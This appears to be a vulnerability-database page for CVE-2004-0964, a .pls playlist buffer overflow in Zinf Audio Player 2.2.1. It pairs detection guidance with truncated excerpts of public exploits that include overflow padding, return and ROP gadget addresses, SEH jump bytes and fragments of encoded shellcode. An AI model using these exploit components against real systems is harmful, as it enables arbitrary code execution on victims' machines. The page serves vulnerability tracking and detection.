CVE-2004-0964
published 2005-02-09CVE-2004-0964: Buffer overflow in Zinf 2.2.1 on Windows, and other older versions for Linux, allows remote attackers or local users to execute arbitrary code via certain…
PriorityP349critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
62.68%
99.1th percentile
Buffer overflow in Zinf 2.2.1 on Windows, and other older versions for Linux, allows remote attackers or local users to execute arbitrary code via certain values in a .pls file.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| zinf | zinf | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x41 x 1424 + \xEB\x06\x90\x90 + \x0C\x04\x05\x12
bytes↗
\x41 x 1300 + \xC8\x2C\x00\x10 + \x90 x 128
- →Detect malicious .pls files with oversized content: legitimate PLS playlists are small; a .pls file containing 1300+ bytes of repeated 'A' (0x41) characters followed by a return address is a strong indicator of exploitation. ↗
- →Look for .pls files containing SEH overwrite pattern: 1424 bytes of padding followed by a short JMP (\xEB\x06\x90\x90) and a return address pointing into zinf.ui (e.g. 0x1204f514 or 0x0C040512). ↗
- →Monitor process creation of Zinf Audio Player (zinf.exe) spawning unexpected child processes (e.g. calc.exe or cmd.exe), which is the payload target in all known public exploits. ↗
- →Flag .pls files opened by Zinf that trigger stack pivot gadgets in vorbisfile.dll (0x10002CC8: push esp; ret) or zinf.ui plugin DLL — these are the universal return addresses used across exploits. ↗
- →Detect ROP chain loading of msvcr71.dll via LoadLibraryA followed by VirtualProtect calls — a DEP bypass technique used in the 2011 exploit variant targeting Windows XP SP3 with DEP AlwaysOn. ↗
- →Alert on .pls files delivered via browser when the .pls extension is registered to Zinf, as this enables remote code execution without user interaction beyond visiting a page. ↗
- →The Metasploit module uses AlphanumMixed encoding with bad chars \x00\x0a\x0d\x3c\x22\x3e\x3d and a stack adjustment of -3500; detect alphanumeric shellcode blobs embedded in .pls files. ↗
- ·The return address 0x1204f514 (pop esi; pop ebx; ret in zinf.ui) is version-specific to Zinf 2.2.1 on Windows XP SP3; it will not be reliable on other OS versions or patch levels. ↗
- ·The DEP bypass ROP chain (exploit-db 17600) was tested only on Windows XP SP3 Brazilian Portuguese with DEP in AlwaysOn mode; gadget addresses from zinf.ui, vorbisfile.dll, and msvcr71.dll will differ on other builds. ↗
- ·The universal vorbisfile.dll gadget (0x10002CC8) was tested on Windows XP SP2 French; ASLR-enabled systems will randomize this address, making the exploit unreliable. ↗
- ·CVE-2004-0964 affects Zinf 2.2.1 on Windows and older Linux versions; the Linux attack surface is noted but no Linux-specific exploit offsets are provided in public PoCs. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (DEP Bypass)
exploitdb·2011-08-03
CVE-2004-0964 Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (DEP Bypass)
Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (DEP Bypass)
---
#!/usr/bin/ruby
#
#[+]Exploit Title: Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability(DEP BYPASS)
#[+]Date: 03\08\2011
#[+]Author: C4SS!0 and h1ch4m
#[+]Found by: Delikon(http://www.exploit-db.com/exploits/559/) or also Metasploit(http://www.exploit-db.com/exploits/16688)
#[+]Software Link: http://sourceforge.net/projects/zinf/files/zinf/2.2.1/zinf-setup-2.2.1.exe/download
#[+]Version: 2.2.1
#[+]Tested on: Windows XP SP3 Brazilian Portuguese(DEP in AlwaysOn)
#[+]CVE: N/A
#
#
#Exploit Based in Corelan Team Tuturial https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/
#LoadLibraryA("msvcr71.dll") + VirtualProtect()
#
sys = `ver`
if sys =~/Windows/
system("cl
Exploit-DB
Zinf Audio Player 2.2.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
exploitdb·2010-11-24
CVE-2004-0964 Zinf Audio Player 2.2.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
Zinf Audio Player 2.2.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
---
##
# $Id: zinfaudioplayer221_pls.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.
An attacker must send the file to victim and the victim must open the file.
Alternatively it may be possible to execute code remotely via an embedded
PLS file within a browser, when the
Exploit-DB
Zinf Audio Player 2.2.1 - '.pls' Universal Overwrite (SEH)
exploitdb·2009-03-23
CVE-2004-0964 Zinf Audio Player 2.2.1 - '.pls' Universal Overwrite (SEH)
Zinf Audio Player 2.2.1 - '.pls' Universal Overwrite (SEH)
---
#usage: exploit.py
print "**************************************************************************"
print " Zinf Audio Player 2.2.1 (.pls) Universal Seh Overwrite Exploit\n"
print " Founder: Hakxer"
print " Exploited by : His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz), www.secdz.com\n"
print "**************************************************************************"
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\
Exploit-DB
Zinf Audio Player 2.2.1 - '.pls' Universal Local Buffer Overflow
exploitdb·2009-01-28
CVE-2004-0964 Zinf Audio Player 2.2.1 - '.pls' Universal Local Buffer Overflow
Zinf Audio Player 2.2.1 - '.pls' Universal Local Buffer Overflow
---
#!/usr/bin/perl -w
# Author : Houssamix
# Zinf Audio Player 2.2.1 (PLS File) Universal Local Buffer Overflow exploit
# tested in windows pro Sp 2 (french)
print "===================================================================== \n";
print "Author : Houssamix \n";
print "===================================================================== \n";
print "Zinf Audio Player 2.2.1 Universal Local Buffer Overflow exploit \n";
print "===================================================================== \n";
my $overflow = "\x41" x 1300;
my $ret = "\xC8\x2C\x00\x10"; #0x10002CC8 push esp - ret > universal adress(vorbisfile.dll)
my $nop = "\x90" x 128 ;
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum h
Exploit-DB
Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
exploitdb·2009-01-27
CVE-2004-0964 Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
---
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (PLS FILE) Buffer Overflow PoC
my $chars="\x90" x 2000;
open(MYFILE,'>>hakxer.pls');
print MYFILE $chars;
close(MYFILE);
print " PoC Created .. Hakxer [ Sec-Geeks.com ] EgY Coders Team";
# milw0rm.com [2009-01-27]
Exploit-DB
Zinf Audio Player 2.2.1 - Local Buffer Overflow
exploitdb·2004-09-28
CVE-2004-0964 Zinf Audio Player 2.2.1 - Local Buffer Overflow
Zinf Audio Player 2.2.1 - Local Buffer Overflow
---
/*
-------------------------------Advisory----------------------------------
Luigi Auriemma
I don't know why this bug has not been tracked but moreover I don't
completely know why it has not been fixed yet in the Windows version of
Zinf.
In short, Zinf is an audio player for Linux and Windows: http://www.zinf.org
The latest Linux version is 2.2.5 while the latest Windows version is 2.2.1
which is still vulnerable to a buffer-overflow bug in the management of the
playlist files ".pls".
This bug has been found and fixed by the same developers in the recent
versions for Linux but, as already said, the vulnerable Windows version is
still downloadable and can be exploited locally and remotely through the web
browser and a malicious pls fi
Metasploit
Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow
metasploit
Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow
Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow
This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extension is registered to Zinf. This functionality has not been tested in this module.
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=109608092609200&w=2http://marc.info/?l=bugtraq&m=109638486728548&w=2http://secunia.com/advisories/12656http://securityreason.com/securityalert/8341http://www.debian.org/security/2004/dsa-587http://www.securityfocus.com/bid/11248https://exchange.xforce.ibmcloud.com/vulnerabilities/17491http://marc.info/?l=bugtraq&m=109608092609200&w=2http://marc.info/?l=bugtraq&m=109638486728548&w=2http://secunia.com/advisories/12656http://securityreason.com/securityalert/8341http://www.debian.org/security/2004/dsa-587http://www.securityfocus.com/bid/11248https://exchange.xforce.ibmcloud.com/vulnerabilities/17491
2005-02-09
Published